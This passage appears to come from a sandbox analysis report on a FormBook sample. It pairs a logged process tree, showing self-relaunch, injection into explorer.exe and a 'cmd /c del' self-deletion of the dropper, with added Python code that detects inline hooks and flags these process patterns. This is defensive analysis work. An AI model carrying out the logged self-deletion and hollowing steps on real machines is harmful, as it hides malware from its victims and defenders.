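    Recognised: E9 rel32 (jmp), 48 B8 imm64 / FF E0 (mov rax,imm64; jmp rax),
    68 imm32 / C3 (push imm32; ret)."""
    b = prologue
    if len(b) >= 5 and b[0] == 0xE9:
        rel = struct.unpack_from("<i", b, 1)[0]
        return "jmp_rel32", (func_va + 5 + rel) & MASK64
    if len(b) >= 12 and b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":
        return "mov_rax_jmp_rax", struct.unpack_from("<Q", b, 2)[0]
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:
        return "push_ret", struct.unpack_from("<I", b, 1)[0]
    return None, None


def classify_prologue(name, mem_bytes, disk_bytes, func_va, module_range):
    """clean: memory matches disk.  inline_hook: the first instruction leaves
    the module.  in_module_jump: redirected but stays inside (e.g. a hot-patch
    stub).  patched_unknown: bytes differ but no known transfer leads."""
    if mem_bytes == disk_bytes:
        return {"function": name, "verdict": "clean"}
    kind, target = decode_redirect(mem_bytes, func_va)
    if kind is None:
        return {"function": name, "verdict": "patched_unknown"}
    lo, hi = module_range
    verdict = "inline_hook" if not (lo <= target < hi) else "in_module_jump"
    return {"function": name, "verdict": verdict, "kind": kind, "target": target}


def scan_exports(exports, module_range):
    """exports: iterable of (name, mem_bytes, disk_bytes, func_va) tuples."""
    return {n: classify_prologue(n, m, d, va, module_range)
            for n, m, d, va in exports}


# --- constructed sample: an assumed user32.dll mapping in a 64-bit process ---
USER32_RANGE = (0x7FFB12340000, 0x7FFB12400000)
DISK_PROLOGUE = bytes.fromhex("488bc4 48895808 48896810 48")  # typical x64 prologue
HOOK_TARGET = 0x6BFF000  # assumed; resembles the injected region in the report
HOOKED = b"\x48\xB8" + struct.pack("<Q", HOOK_TARGET) + b"\xFF\xE0"
NEARBY = b"\xE9" + struct.pack("<i", 0x1000) + DISK_PROLOGUE[5:]

SAMPLE_EXPORTS = [
    ("PeekMessageA", HOOKED, DISK_PROLOGUE, 0x7FFB12355000),
    ("GetMessageW", NEARBY, DISK_PROLOGUE, 0x7FFB12357000),
    ("TranslateMessage", DISK_PROLOGUE, DISK_PROLOGUE, 0x7FFB12359000),
]

if __name__ == "__main__":
    for fn, result in scan_exports(SAMPLE_EXPORTS, USER32_RANGE).items():
        print(fn, result)
```

The absolute forms matter for a 64-bit host such as explorer.exe: a rel32 jmp reaches only ±2 GB, so a hook placed in a high user32 mapping cannot reach a low injected region with E9 alone and has to use mov rax/jmp rax or an indirect jump through a pointer slot. A scanner that only looks for E9 misses those.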

                                      Statistics

                                      Behavior


                                      System Behavior

                                      General

                                      Start time:14:07:41
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\EH5ro3Hyug.exe'
                                      Imagebase:0x810000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689245304.0000000002C6F000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:14:07:51
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Imagebase:0xc0000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Start time:14:07:51
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Imagebase:0xf20000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:14:07:53
                                      Start date:27/09/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff6fee60000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:14:08:19
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\autoconv.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\SysWOW64\autoconv.exe
                                      Imagebase:0xd50000
                                      File size:851968 bytes
                                      MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:14:08:20
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\WWAHost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                      Imagebase:0x9b0000
                                      File size:829856 bytes
                                      MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:14:08:24
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:14:08:24
                                      Start date:27/09/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
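Added example (not from the report): detection logic run over process-creation events modelled on the process list above. PIDs and parent links are assumed from the start times and the injection behaviour the signatures describe, since this section of the report does not show them. The rules flag a binary re-launching its own image, explorer.exe starting a SysWOW64 binary with a bare command line, and a cmd.exe /c del whose target is the image of another process observed in the session.

```python
"""Process-tree rules for the hollowing / self-delete pattern in the report."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int       # assumed; the report section above lists no PIDs
    ppid: int
    image: str
    cmdline: str
    wow64: bool


# Matches `/c del "<path>"` or `/c del '<path>'` as the report renders it
_DEL_RE = re.compile(r"""/c\s+del\s+["']?(.+?)["']?\s*$""", re.IGNORECASE)
_SYSWOW64 = "c:\\windows\\syswow64\\"


def detect(events):
    """Return (pid, rule) tuples for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    images = {e.image.lower() for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        image = e.image.lower()
        # Rule 1: a process starts a fresh copy of its own binary
        # (the three EH5ro3Hyug.exe instances above).
        if parent and parent.image.lower() == image:
            alerts.append((e.pid, "self_reexec"))
        # Rule 2: explorer.exe starts a SysWOW64 binary whose command line is
        # nothing but its own path (autoconv.exe, WWAHost.exe above).
        if (parent and ntpath.basename(parent.image).lower() == "explorer.exe"
                and image.startswith(_SYSWOW64)
                and e.cmdline.strip().strip("'\"").lower() == image):
            alerts.append((e.pid, "explorer_spawned_bare_syswow64"))
        # Rule 3: cmd.exe deletes the image of a process seen in this session.
        m = _DEL_RE.search(e.cmdline)
        if m and ntpath.basename(image) == "cmd.exe":
            if m.group(1).strip().lower() in images:
                alerts.append((e.pid, "delete_of_executed_image"))
    return alerts


# Constructed events modelled on the process list (PIDs and parents assumed)
SAMPLE_EVENTS = [
    ProcEvent(100, 50, r"C:\Users\user\Desktop\EH5ro3Hyug.exe", r"'C:\Users\user\Desktop\EH5ro3Hyug.exe'", True),
    ProcEvent(104, 100, r"C:\Users\user\Desktop\EH5ro3Hyug.exe", r"C:\Users\user\Desktop\EH5ro3Hyug.exe", False),
    ProcEvent(106, 100, r"C:\Users\user\Desktop\EH5ro3Hyug.exe", r"C:\Users\user\Desktop\EH5ro3Hyug.exe", True),
    ProcEvent(200, 50, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE", False),
    ProcEvent(210, 200, r"C:\Windows\SysWOW64\autoconv.exe", r"C:\Windows\SysWOW64\autoconv.exe", False),
    ProcEvent(212, 200, r"C:\Windows\SysWOW64\WWAHost.exe", r"C:\Windows\SysWOW64\WWAHost.exe", True),
    ProcEvent(214, 212, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'", True),
    ProcEvent(216, 214, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Rule 3 deliberately checks the delete target against every image seen in the session rather than only the cmd.exe ancestor chain: the deleting cmd.exe here descends from the hollowed system binary and explorer.exe, not from the dropper it removes, so an ancestor-only rule would miss this sample.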

                                      Disassembly

                                      Code Analysis
